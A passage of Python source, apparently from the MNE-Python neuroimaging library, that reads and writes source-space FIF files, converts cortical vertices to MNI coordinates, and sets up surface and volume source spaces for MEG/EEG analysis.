tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST)
if tag1 is None or tag2 is None:
res['nearest'] = None
res['nearest_dist'] = None
else:
res['nearest'] = tag1.data
res['nearest_dist'] = tag2.data.T
_add_patch_info(res)
# Distances
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT)
if tag1 is None or tag2 is None:
res['dist'] = None
res['dist_limit'] = None
else:
res['dist'] = tag1.data
res['dist_limit'] = tag2.data
# Add the upper triangle
res['dist'] = res['dist'] + res['dist'].T
if (res['dist'] is not None):
logger.info(' Distance information added...')
tag = find_tag(fid, this, FIFF.FIFF_SUBJ_HIS_ID)
if tag is not None:
res['subject_his_id'] = tag.data
return res
@verbose
def _complete_source_space_info(this, verbose=None):
"""Add more info on surface
"""
# Main triangulation
logger.info(' Completing triangulation info...')
this['tri_area'] = np.zeros(this['ntri'])
r1 = this['rr'][this['tris'][:, 0], :]
r2 = this['rr'][this['tris'][:, 1], :]
r3 = this['rr'][this['tris'][:, 2], :]
this['tri_cent'] = (r1 + r2 + r3) / 3.0
this['tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
size = np.sqrt(np.sum(this['tri_nn'] ** 2, axis=1))
this['tri_area'] = size / 2.0
this['tri_nn'] /= size[:, None]
logger.info('[done]')
# Selected triangles
logger.info(' Completing selection triangulation info...')
if this['nuse_tri'] > 0:
r1 = this['rr'][this['use_tris'][:, 0], :]
r2 = this['rr'][this['use_tris'][:, 1], :]
r3 = this['rr'][this['use_tris'][:, 2], :]
this['use_tri_cent'] = (r1 + r2 + r3) / 3.0
this['use_tri_nn'] = fast_cross_3d((r2 - r1), (r3 - r1))
this['use_tri_area'] = np.sqrt(np.sum(this['use_tri_nn'] ** 2, axis=1)
) / 2.0
logger.info('[done]')
def find_source_space_hemi(src):
"""Return the hemisphere id for a source space
Parameters
----------
src : dict
The source space to investigate
Returns
-------
hemi : int
Deduced hemisphere id
"""
xave = src['rr'][:, 0].sum()
if xave < 0:
hemi = int(FIFF.FIFFV_MNE_SURF_LEFT_HEMI)
else:
hemi = int(FIFF.FIFFV_MNE_SURF_RIGHT_HEMI)
return hemi
def label_src_vertno_sel(label, src):
""" Find vertex numbers and indices from label
Parameters
----------
label : Label
Source space label
src : dict
Source space
Returns
-------
vertices : list of length 2
Vertex numbers for lh and rh
src_sel : array of int (len(idx) = len(vertices[0]) + len(vertices[1]))
Indices of the selected vertices in sourse space
"""
if src[0]['type'] != 'surf':
return Exception('Labels are only supported with surface source '
'spaces')
vertno = [src[0]['vertno'], src[1]['vertno']]
if label.hemi == 'lh':
vertno_sel = np.intersect1d(vertno[0], label.vertices)
src_sel = np.searchsorted(vertno[0], vertno_sel)
vertno[0] = vertno_sel
vertno[1] = np.array([], int)
elif label.hemi == 'rh':
vertno_sel = np.intersect1d(vertno[1], label.vertices)
src_sel = np.searchsorted(vertno[1], vertno_sel) + len(vertno[0])
vertno[0] = np.array([], int)
vertno[1] = vertno_sel
elif label.hemi == 'both':
vertno_sel_lh = np.intersect1d(vertno[0], label.lh.vertices)
src_sel_lh = np.searchsorted(vertno[0], vertno_sel_lh)
vertno_sel_rh = np.intersect1d(vertno[1], label.rh.vertices)
src_sel_rh = np.searchsorted(vertno[1], vertno_sel_rh) + len(vertno[0])
src_sel = np.hstack((src_sel_lh, src_sel_rh))
vertno = [vertno_sel_lh, vertno_sel_rh]
else:
raise Exception("Unknown hemisphere type")
return vertno, src_sel
def _get_vertno(src):
return [s['vertno'] for s in src]
###############################################################################
# Write routines
@verbose
def _write_source_spaces_to_fid(fid, src, verbose=None):
"""Write the source spaces to a FIF file
Parameters
----------
fid : file descriptor
An open file descriptor.
src : list
The list of source spaces.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
"""
for s in src:
logger.info(' Write a source space...')
start_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
_write_one_source_space(fid, s, verbose)
end_block(fid, FIFF.FIFFB_MNE_SOURCE_SPACE)
logger.info(' [done]')
logger.info(' %d source spaces written' % len(src))
@verbose
def write_source_spaces(fname, src, verbose=None):
"""Write source spaces to a file
Parameters
----------
fname : str
The name of the file, which should end with -src.fif or
-src.fif.gz.
src : SourceSpaces
The source spaces (as returned by read_source_spaces).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
See Also
--------
read_source_spaces
"""
check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz'))
fid = start_file(fname)
start_block(fid, FIFF.FIFFB_MNE)
if src.info:
start_block(fid, FIFF.FIFFB_MNE_ENV)
write_id(fid, FIFF.FIFF_BLOCK_ID)
data = src.info.get('working_dir', None)
if data:
write_string(fid, FIFF.FIFF_MNE_ENV_WORKING_DIR, data)
data = src.info.get('command_line', None)
if data:
write_string(fid, FIFF.FIFF_MNE_ENV_COMMAND_LINE, data)
end_block(fid, FIFF.FIFFB_MNE_ENV)
_write_source_spaces_to_fid(fid, src, verbose)
end_block(fid, FIFF.FIFFB_MNE)
end_file(fid)
def _write_one_source_space(fid, this, verbose=None):
"""Write one source space"""
if this['type'] == 'surf':
src_type = FIFF.FIFFV_MNE_SPACE_SURFACE
elif this['type'] == 'vol':
src_type = FIFF.FIFFV_MNE_SPACE_VOLUME
elif this['type'] == 'discrete':
src_type = FIFF.FIFFV_MNE_SPACE_DISCRETE
else:
raise ValueError('Unknown source space type (%s)' % this['type'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE, src_type)
if this['id'] >= 0:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_ID, this['id'])
data = this.get('subject_his_id', None)
if data:
write_string(fid, FIFF.FIFF_SUBJ_HIS_ID, data)
write_int(fid, FIFF.FIFF_MNE_COORD_FRAME, this['coord_frame'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS, this['np'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS, this['rr'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS, this['nn'])
# Which vertices are active
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION, this['inuse'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE, this['nuse'])
if this['ntri'] > 0:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI, this['ntri'])
write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES,
this['tris'] + 1)
if this['type'] != 'vol' and this['use_tris'] is not None:
# Use triangulation
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI, this['nuse_tri'])
write_int_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES,
this['use_tris'] + 1)
if this['type'] == 'vol':
neighbor_vert = this.get('neighbor_vert', None)
if neighbor_vert is not None:
nneighbors = np.array([len(n) for n in neighbor_vert])
neighbors = np.concatenate(neighbor_vert)
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS, nneighbors)
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS, neighbors)
write_coord_trans(fid, this['src_mri_t'])
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS, this['shape'])
start_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
write_coord_trans(fid, this['mri_ras_t'])
write_coord_trans(fid, this['vox_mri_t'])
mri_volume_name = this.get('mri_volume_name', None)
if mri_volume_name is not None:
write_string(fid, FIFF.FIFF_MNE_FILE_NAME, mri_volume_name)
write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR,
this['interpolator'])
if 'mri_file' in this and this['mri_file'] is not None:
write_string(fid, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE,
this['mri_file'])
write_int(fid, FIFF.FIFF_MRI_WIDTH, this['mri_width'])
write_int(fid, FIFF.FIFF_MRI_HEIGHT, this['mri_height'])
write_int(fid, FIFF.FIFF_MRI_DEPTH, this['mri_depth'])
end_block(fid, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
# Patch-related information
if this['nearest'] is not None:
write_int(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST, this['nearest'])
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST_DIST,
this['nearest_dist'])
# Distances
if this['dist'] is not None:
# Save only upper triangular portion of the matrix
dists = this['dist'].copy()
dists = sparse.triu(dists, format=dists.format)
write_float_sparse_rcs(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST, dists)
write_float_matrix(fid, FIFF.FIFF_MNE_SOURCE_SPACE_DIST_LIMIT,
this['dist_limit'])
# Segmentation data
if this['type'] == 'vol' and ('seg_name' in this):
# Save the name of the segment
write_string(fid, FIFF.FIFF_COMMENT, this['seg_name'])
##############################################################################
# Surface to MNI conversion
@verbose
def vertex_to_mni(vertices, hemis, subject, subjects_dir=None, mode=None,
verbose=None):
"""Convert the array of vertices for a hemisphere to MNI coordinates
Parameters
----------
vertices : int, or list of int
Vertex number(s) to convert
hemis : int, or list of int
Hemisphere(s) the vertices belong to
subject : string
Name of the subject to load surfaces from.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
mode : string | None
Either 'nibabel' or 'freesurfer' for the software to use to
obtain the transforms. If None, 'nibabel' is tried first, falling
back to 'freesurfer' if it fails. Results should be equivalent with
either option, but nibabel may be quicker (and more pythonic).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
coordinates : n_vertices x 3 array of float
The MNI coordinates (in mm) of the vertices
Notes
-----
This function requires either nibabel (in Python) or Freesurfer
(with utility "mri_info") to be correctly installed.
"""
if not has_freesurfer() and not has_nibabel():
raise RuntimeError('NiBabel (Python) or Freesurfer (Unix) must be '
'correctly installed and accessible from Python')
if not isinstance(vertices, list) and not isinstance(vertices, np.ndarray):
vertices = [vertices]
if not isinstance(hemis, list) and not isinstance(hemis, np.ndarray):
hemis = [hemis] * len(vertices)
if not len(hemis) == len(vertices):
raise ValueError('hemi and vertices must match in length')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
surfs = [op.join(subjects_dir, subject, 'surf', '%s.white' % h)
for h in ['lh', 'rh']]
# read surface locations in MRI space
rr = [read_surface(s)[0] for s in surfs]
# take point locations in MRI space and convert to MNI coordinates
xfm = _read_talxfm(subject, subjects_dir, mode)
data = np.array([rr[h][v, :] for h, v in zip(hemis, vertices)])
return apply_trans(xfm['trans'], data)
@verbose
def _read_talxfm(subject, subjects_dir, mode=None, verbose=None):
"""Read MNI transform from FreeSurfer talairach.xfm file
Adapted from freesurfer m-files. Altered to deal with Norig
and Torig correctly.
"""
if mode is not None and mode not in ['nibabel', 'freesurfer']:
raise ValueError('mode must be "nibabel" or "freesurfer"')
fname = op.join(subjects_dir, subject, 'mri', 'transforms',
'talairach.xfm')
# read the RAS to MNI transform from talairach.xfm
with open(fname, 'r') as fid:
logger.debug('Reading FreeSurfer talairach.xfm file:\n%s' % fname)
# read lines until we get the string 'Linear_Transform', which precedes
# the data transformation matrix
got_it = False
comp = 'Linear_Transform'
for line in fid:
if line[:len(comp)] == comp:
# we have the right line, so don't read any more
got_it = True
break
if got_it:
xfm = list()
# read the transformation matrix (3x4)
for ii, line in enumerate(fid):
digs = [float(s) for s in line.strip('\n;').split()]
xfm.append(digs)
if ii == 2:
break
xfm.append([0., 0., 0., 1.])
xfm = np.array(xfm, dtype=float)
else:
raise ValueError('failed to find \'Linear_Transform\' string in '
'xfm file:\n%s' % fname)
# Setup the RAS to MNI transform
ras_mni_t = {'from': FIFF.FIFFV_MNE_COORD_RAS,
'to': FIFF.FIFFV_MNE_COORD_MNI_TAL, 'trans': xfm}
# now get Norig and Torig
# (i.e. vox_ras_t and vox_mri_t, respectively)
path = op.join(subjects_dir, subject, 'mri', 'orig.mgz')
if not op.isfile(path):
path = op.join(subjects_dir, subject, 'mri', 'T1.mgz')
if not op.isfile(path):
raise IOError('mri not found: %s' % path)
if has_nibabel():
use_nibabel = True
else:
use_nibabel = False
if mode == 'nibabel':
raise ImportError('Tried to import nibabel but failed, try using '
'mode=None or mode=Freesurfer')
# note that if mode == None, then we default to using nibabel
if use_nibabel is True and mode == 'freesurfer':
use_nibabel = False
if use_nibabel:
import nibabel as nib
img = nib.load(path)
hdr = img.get_header()
# read the MRI_VOXEL to RAS transform
n_orig = hdr.get_vox2ras()
# read the MRI_VOXEL to MRI transform
ds = np.array(hdr.get_zooms())
ns = (np.array(hdr.get_data_shape()[:3]) * ds) / 2.0
t_orig = np.array([[-ds[0], 0, 0, ns[0]],
[0, 0, ds[2], -ns[2]],
[0, -ds[1], 0, ns[1]],
[0, 0, 0, 1]], dtype=float)
nt_orig = [n_orig, t_orig]
else:
nt_orig = list()
for conv in ['--vox2ras', '--vox2ras-tkr']:
stdout, stderr = run_subprocess(['mri_info', conv, path])
stdout = np.fromstring(stdout, sep=' ').astype(float)
if not stdout.size == 16:
raise ValueError('Could not parse Freesurfer mri_info output')
nt_orig.append(stdout.reshape(4, 4))
# extract the MRI_VOXEL to RAS transform
n_orig = nt_orig[0]
vox_ras_t = {'from': FIFF.FIFFV_MNE_COORD_MRI_VOXEL,
'to': FIFF.FIFFV_MNE_COORD_RAS,
'trans': n_orig}
# extract the MRI_VOXEL to MRI transform
t_orig = nt_orig[1]
vox_mri_t = Transform('mri_voxel', 'mri', t_orig)
# invert MRI_VOXEL to MRI to get the MRI to MRI_VOXEL transform
mri_vox_t = invert_transform(vox_mri_t)
# construct an MRI to RAS transform
mri_ras_t = combine_transforms(mri_vox_t, vox_ras_t, 'mri', 'ras')
# construct the MRI to MNI transform
mri_mni_t = combine_transforms(mri_ras_t, ras_mni_t, 'mri', 'mni_tal')
return mri_mni_t
###############################################################################
# Creation and decimation
@verbose
def setup_source_space(subject, fname=True, spacing='oct6', surface='white',
overwrite=False, subjects_dir=None, add_dist=True,
n_jobs=1, verbose=None):
"""Setup a source space with subsampling
Parameters
----------
subject : str
Subject to process.
fname : str | None | bool
Filename to use. If True, a default name will be used. If None,
the source space will not be saved (only returned).
spacing : str
The spacing to use. Can be ``'ico#'`` for a recursively subdivided
icosahedron, ``'oct#'`` for a recursively subdivided octahedron,
or ``'all'`` for all points.
surface : str
The surface to use.
overwrite: bool
If True, overwrite output file (if it exists).
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
add_dist : bool
Add distance and patch information to the source space. This takes some
time so precomputing it is recommended.
n_jobs : int
Number of jobs to run in parallel. Will use at most 2 jobs
(one for each hemisphere).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
src : list
The source space for each hemisphere.
"""
cmd = ('setup_source_space(%s, fname=%s, spacing=%s, surface=%s, '
'overwrite=%s, subjects_dir=%s, add_dist=%s, verbose=%s)'
% (subject, fname, spacing, surface, overwrite,
subjects_dir, add_dist, verbose))
# check to make sure our parameters are good, parse 'spacing'
space_err = ('"spacing" must be a string with values '
'"ico#", "oct#", or "all", and "ico" and "oct"'
'numbers must be integers')
if not isinstance(spacing, string_types) or len(spacing) < 3:
raise ValueError(space_err)
if spacing == 'all':
stype = 'all'
sval = ''
elif spacing[:3] == 'ico':
stype = 'ico'
sval = spacing[3:]
elif spacing[:3] == 'oct':
stype = 'oct'
sval = spacing[3:]
else:
raise ValueError(space_err)
try:
if stype in ['ico', 'oct']:
sval = int(sval)
elif stype == 'spacing': # spacing
sval = float(sval)
except:
raise ValueError(space_err)
subjects_dir = get_subjects_dir(subjects_dir)
surfs = [op.join(subjects_dir, subject, 'surf', hemi + surface)
for hemi in ['lh.', 'rh.']]
bem_dir = op.join(subjects_dir, subject, 'bem')
for surf, hemi in zip(surfs, ['LH', 'RH']):
if surf is not None and not op.isfile(surf):
raise IOError('Could not find the %s surface %s'
% (hemi, surf))
if not (fname is True or fname is None or isinstance(fname, string_types)):
raise ValueError('"fname" must be a string, True, or None')
if fname is True:
extra = '%s-%s' % (stype, sval) if sval != '' else stype
fname = op.join(bem_dir, '%s-%s-src.fif' % (subject, extra))
if fname is not None and op.isfile(fname) and overwrite is False:
raise IOError('file "%s" exists, use overwrite=True if you want '
'to overwrite the file' % fname)
logger.info('Setting up the source space with the following parameters:\n')
logger.info('SUBJECTS_DIR = %s' % subjects_dir)
logger.info('Subject = %s' % subject)
logger.info('Surface = %s' % surface)
if stype == 'ico':
src_type_str = 'ico = %s' % sval
logger.info('Icosahedron subdivision grade %s\n' % sval)
elif stype == 'oct':
src_type_str = 'oct = %s' % sval
logger.info('Octahedron subdivision grade %s\n' % sval)
else:
src_type_str = 'all'
logger.info('Include all vertices\n')
# Create the fif file
if fname is not None:
logger.info('>>> 1. Creating the source space file %s...' % fname)
else:
logger.info('>>> 1. Creating the source space...\n')
# mne_make_source_space ... actually make the source spaces
src = []
# pre-load ico/oct surf (once) for speed, if necessary
if stype in ['ico', 'oct']:
# ### from mne_ico_downsample.c ###
if stype == 'ico':
logger.info('Doing the icosahedral vertex picking...')
ico_surf = _get_ico_surface(sval)
else:
logger.info('Doing the octahedral vertex picking...')
ico_surf = _tessellate_sphere_surf(sval)
else:
ico_surf = None
for hemi, surf in zip(['lh', 'rh'], surfs):
logger.info('Loading %s...' % surf)
# Setup the surface spacing in the MRI coord frame
s = _create_surf_spacing(surf, hemi, subject, stype, sval, ico_surf,
subjects_dir)
logger.info('loaded %s %d/%d selected to source space (%s)'
% (op.split(surf)[1], s['nuse'], s['np'], src_type_str))
src.append(s)
logger.info('') # newline after both subject types are run
# Fill in source space info
hemi_ids = [FIFF.FIFFV_MNE_SURF_LEFT_HEMI, FIFF.FIFFV_MNE_SURF_RIGHT_HEMI]
for s, s_id in zip(src, hemi_ids):
# Add missing fields
s.update(dict(dist=None, dist_limit=None, nearest=None, type='surf',
nearest_dist=None, pinfo=None, patch_inds=None, id=s_id,
coord_frame=np.array((FIFF.FIFFV_COORD_MRI,), np.int32)))
s['rr'] /= 1000.0
del s['tri_area']
del s['tri_cent']
del s['tri_nn']
del s['neighbor_tri']
# upconvert to object format from lists
src = SourceSpaces(src, dict(working_dir=os.getcwd(), command_line=cmd))
if add_dist:
add_source_space_distances(src, n_jobs=n_jobs, verbose=verbose)
# write out if requested, then return the data
if fname is not None:
write_source_spaces(fname, src)
logger.info('Wrote %s' % fname)
logger.info('You are now one step closer to computing the gain matrix')
return src
@verbose
def setup_volume_source_space(subject, fname=None, pos=5.0, mri=None,
sphere=(0.0, 0.0, 0.0, 90.0), bem=None,
surface=None, mindist=5.0, exclude=0.0,
overwrite=False, subjects_dir=None,
volume_label=None, add_interpolator=True,
verbose=None):
"""Setup a volume source space with grid spacing or discrete source space
Parameters
----------
subject : str
Subject to process.
fname : str | None
Filename to use. If None, the source space will not be saved
(only returned).
pos : float | dict
Positions to use for sources. If float, a grid will be constructed
with the spacing given by `pos` in mm, generating a volume source
space. If dict, pos['rr'] and pos['nn'] will be used as the source
space locations (in meters) and normals, respectively, creating a
discrete source space. NOTE: For a discrete source space (`pos` is
a dict), `mri` must be None.
mri : str | None
The filename of an MRI volume (mgh or mgz) to create the
interpolation matrix over. Source estimates obtained in the
volume source space can then be morphed onto the MRI volume
using this interpolator. If pos is a dict, this can be None.
sphere : array_like (length 4)
Define spherical source space bounds using origin and radius given
by (ox, oy, oz, rad) in mm. Only used if `bem` and `surface` are
both None.
bem : str | None
Define source space bounds using a BEM file (specifically the inner
skull surface).
surface : str | dict | None
Define source space bounds using a FreeSurfer surface file. Can
also be a dictionary with entries `'rr'` and `'tris'`, such as
those returned by `read_surface()`.
mindist : float
Exclude points closer than this distance (mm) to the bounding surface.
exclude : float
Exclude points closer than this distance (mm) from the center of mass
of the bounding surface.
overwrite: bool
If True, overwrite output file (if it exists).
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
volume_label : str | None
Region of interest corresponding with freesurfer lookup table.
add_interpolator : bool
If True and ``mri`` is not None, then an interpolation matrix
will be produced.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
src : list
The source space. Note that this list will have length 1 for
compatibility reasons, as most functions expect source spaces
to be provided as lists).
Notes
-----
To create a discrete source space, `pos` must be a dict, 'mri' must be
None, and 'volume_label' must be None. To create a whole brain volume
source space, `pos` must be a float and 'mri' must be provided. To create
a volume source space from label, 'pos' must be a float, 'volume_label'
must be provided, and 'mri' must refer to a .mgh or .mgz file with values
corresponding to the freesurfer lookup-table (typically aseg.mgz).
"""
subjects_dir = get_subjects_dir(subjects_dir)
if bem is not None and surface is not None:
raise ValueError('Only one of "bem" and "surface" should be '
'specified')
if mri is not None:
if not op.isfile(mri):
raise IOError('mri file "%s" not found' % mri)
if isinstance(pos, dict):
raise ValueError('Cannot create interpolation matrix for '
'discrete source space, mri must be None if '
'pos is a dict')
if volume_label is not None:
if mri is None:
raise RuntimeError('"mri" must be provided if "volume_label" is '
'not None')
# Check that volume label is found in .mgz file
volume_labels = get_volume_labels_from_aseg(mri)
if volume_label not in volume_labels:
raise ValueError('Volume %s not found in file %s. Double check '
'freesurfer lookup table.' % (volume_label, mri))
sphere = np.asarray(sphere)
if sphere.size != 4:
raise ValueError('"sphere" must be array_like with 4 elements')
# triage bounding argument
if bem is not None:
logger.info('BEM file : %s', bem)
elif surface is not None:
if isinstance(surface, dict):
if not all(key in surface for key in ['rr', 'tris']):
raise KeyError('surface, if dict, must have entries "rr" '
'and "tris"')
# let's make sure we have geom info
surface = _read_surface_geom(surface, verbose=False)
surf_extra = 'dict()'
elif isinstance(surface, string_types):
if not op.isfile(surface):
raise IOError('surface file "%s" not found' % surface)
surf_extra = surface
logger.info('Boundary surface file : %s', surf_extra)
else:
logger.info('Sphere : origin at (%.1f %.1f %.1f) mm'
% (sphere[0], sphere[1], sphere[2]))
logger.info(' radius : %.1f mm' % sphere[3])
# triage pos argument
if isinstance(pos, dict):
if not all(key in pos for key in ['rr', 'nn']):
raise KeyError('pos, if dict, must contain "rr" and "nn"')
pos_extra = 'dict()'
else: # pos should be float-like
try:
pos = float(pos)
except (TypeError, ValueError):
raise ValueError('pos must be a dict, or something that can be '
'cast to float()')
if not isinstance(pos, float):
logger.info('Source location file : %s', pos_extra)
logger.info('Assuming input in millimeters')
logger.info('Assuming input in MRI coordinates')
logger.info('Output file : %s', fname)
if isinstance(pos, float):
logger.info('grid : %.1f mm' % pos)
logger.info('mindist : %.1f mm' % mindist)
pos /= 1000.0 # convert pos from m to mm
if exclude > 0.0:
logger.info('Exclude : %.1f mm' % exclude)
if mri is not None:
logger.info('MRI volume : %s' % mri)
exclude /= 1000.0 # convert exclude from m to mm
logger.info('')
# Explicit list of points
if not isinstance(pos, float):
# Make the grid of sources
sp = _make_discrete_source_space(pos)
else:
# Load the brain surface as a template
if bem is not None:
# read bem surface in the MRI coordinate frame
surf = read_bem_surfaces(bem, s_id=FIFF.FIFFV_BEM_SURF_ID_BRAIN,
verbose=False)
logger.info('Loaded inner skull from %s (%d nodes)'
% (bem, surf['np']))
elif surface is not None:
if isinstance(surface, string_types):
# read the surface in the MRI coordinate frame
surf = _read_surface_geom(surface)
else:
surf = surface
logger.info('Loaded bounding surface from %s (%d nodes)'
% (surface, surf['np']))
surf = deepcopy(surf)
surf['rr'] *= 1e-3 # must be converted to meters
else: # Load an icosahedron and use that as the surface
logger.info('Setting up the sphere...')
surf = _get_ico_surface(3)
# Scale and shift
# center at origin and make radius 1
_normalize_vectors(surf['rr'])
# normalize to sphere (in MRI coord frame)
surf['rr'] *= sphere[3] / 1000.0 # scale by radius
surf['rr'] += sphere[:3] / 1000.0 # move by center
_complete_surface_info(surf, True)
# Make the grid of sources in MRI space
sp = _make_volume_source_space(surf, pos, exclude, mindist, mri,
volume_label)
# Compute an interpolation matrix to show data in MRI_VOXEL coord frame
if mri is not None:
_add_interpolator(sp, mri, add_interpolator)
elif sp['type'] == 'vol':
# If there is no interpolator, it's actually a discrete source space
sp['type'] = 'discrete'
if 'vol_dims' in sp:
del sp['vol_dims']
# Save it
sp.update(dict(nearest=None, dist=None, use_tris=None, patch_inds=None,
dist_limit=None, pinfo=None, ntri=0, nearest_dist=None,
nuse_tri=0, tris=None))
sp = SourceSpaces([sp], dict(working_dir=os.getcwd(), command_line='None'))
if fname is not None:
write_source_spaces(fname, sp, verbose=False)
return sp
def _make_voxel_ras_trans(move, ras, voxel_size):
"""Make a transformation from MRI_VOXEL to MRI surface RAS (i.e. MRI)"""
assert voxel_size.ndim == 1
assert voxel_size.size == 3
rot = ras.T * voxel_size[np.newaxis, :]
assert rot.ndim == 2
assert rot.shape[0] == 3
assert rot.shape[1] == 3
trans = np.c_[np.r_[rot, np.zeros((1, 3))], np.r_[move, 1.0]]
t = Transform('mri_voxel', 'mri', trans)
return t
def _make_discrete_source_space(pos):
"""Use a discrete set of source locs/oris to make src space
Parameters
----------
pos : dict
Must have entries "rr" and "nn". Data should be in meters.
Returns
-------
src : dict
The source space.
"""
# process points
rr = pos['rr'].copy()
nn = pos['nn'].copy()
if not (rr.ndim == nn.ndim == 2 and nn.shape[0] == nn.shape[0] and
rr.shape[1] == nn.shape[1]):
raise RuntimeError('"rr" and "nn" must both be 2D arrays with '
'the same number of rows and 3 columns')
npts = rr.shape[0]
_normalize_vectors(nn)
nz = np.sum(np.sum(nn * nn, axis=1) == 0)
if nz != 0:
raise RuntimeError('%d sources have zero length normal' % nz)
logger.info('Positions (in meters) and orientations')
logger.info('%d sources' % npts)
# Ready to make the source space
coord_frame = FIFF.FIFFV_COORD_MRI
sp = dict(coord_frame=coord_frame, type='discrete', nuse=npts, np=npts,
inuse=np.ones(npts, int), vertno=np.arange(npts), rr=rr, nn=nn,
id=-1)
return sp
def _make_volume_source_space(surf, grid, exclude, mindist, mri=None,
volume_label=None, do_neighbors=True, n_jobs=1):
"""Make a source space which covers the volume bounded by surf"""
# Figure out the grid size in the MRI coordinate frame
mins = np.min(surf['rr'], axis=0)
maxs = np.max(surf['rr'], axis=0)
cm = np.mean(surf['rr'], axis=0) # center of mass
# Define the sphere which fits the surface
maxdist = np.sqrt(np.max(np.sum((surf['rr'] - cm) ** 2, axis=1)))
logger.info('Surface CM = (%6.1f %6.1f %6.1f) mm'
% (1000 * cm[0], 1000 * cm[1], 1000 * cm[2]))
logger.info('Surface fits inside a sphere with radius %6.1f mm'
% (1000 * maxdist))
logger.info('Surface extent:')
for c, mi, ma in zip('xyz', mins, maxs):
logger.info(' %s = %6.1f ... %6.1f mm' % (c, 1000 * mi, 1000 * ma))
maxn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
np.floor(np.abs(m) / grid) - 1 for m in maxs], int)
minn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
np.floor(np.abs(m) / grid) - 1 for m in mins], int)
logger.info('Grid extent:')
for c, mi, ma in zip('xyz', minn, maxn):
logger.info(' %s = %6.1f ... %6.1f mm'
% (c, 1000 * mi * grid, 1000 * ma * grid))
# Now make the initial grid
ns = maxn - minn + 1
npts = np.prod(ns)
nrow = ns[0]
ncol = ns[1]
nplane = nrow * ncol
# x varies fastest, then y, then z (can use unravel to do this)
rr = meshgrid(np.arange(minn[2], maxn[2] + 1),
np.arange(minn[1], maxn[1] + 1),
np.arange(minn[0], maxn[0] + 1), indexing='ij')
x, y, z = rr[2].ravel(), rr[1].ravel(), rr[0].ravel()
rr = np.array([x * grid, y * grid, z * grid]).T
sp = dict(np=npts, nn=np.zeros((npts, 3)), rr=rr,
inuse=np.ones(npts, int), type='vol', nuse=npts,
coord_frame=FIFF.FIFFV_COORD_MRI, id=-1, shape=ns)
sp['nn'][:, 2] = 1.0
assert sp['rr'].shape[0] == npts
logger.info('%d sources before omitting any.', sp['nuse'])
# Exclude infeasible points
dists = np.sqrt(np.sum((sp['rr'] - cm) ** 2, axis=1))
bads = np.where(np.logical_or(dists < exclude, dists > maxdist))[0]
sp['inuse'][bads] = False
sp['nuse'] -= len(bads)
logger.info('%d sources after omitting infeasible sources.', sp['nuse'])
_filter_source_spaces(surf, mindist, None, [sp], n_jobs)
logger.info('%d sources remaining after excluding the sources outside '
'the surface and less than %6.1f mm inside.'
% (sp['nuse'], mindist))
if not do_neighbors:
if volume_label is not None:
raise RuntimeError('volume_label cannot be None unless '
'do_neighbors is True')
return sp
k = np.arange(npts)
neigh = np.empty((26, npts), int)
neigh.fill(-1)
# Figure out each neighborhood:
# 6-neighborhood first
idxs = [z > minn[2], x < maxn[0], y < maxn[1],
x > minn[0], y > minn[1], z < maxn[2]]
offsets = [-nplane, 1, nrow, -1, -nrow, nplane]
for n, idx, offset in zip(neigh[:6], idxs, offsets):
n[idx] = k[idx] + offset
# Then the rest to complete the 26-neighborhood
# First the plane below
idx1 = z > minn[2]
idx2 = np.logical_and(idx1, x < maxn[0])
neigh[6, idx2] = k[idx2] + 1 - nplane
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[7, idx3] = k[idx3] + 1 + nrow - nplane
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[8, idx2] = k[idx2] + nrow - nplane
idx2 = np.logical_and(idx1, x > minn[0])
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[9, idx3] = k[idx3] - 1 + nrow - nplane
neigh[10, idx2] = k[idx2] - 1 - nplane
idx3 = np.logical_and(idx2, y > minn[1])
neigh[11, idx3] = k[idx3] - 1 - nrow - nplane
idx2 = np.logical_and(idx1, y > minn[1])
neigh[12, idx2] = k[idx2] - nrow - nplane
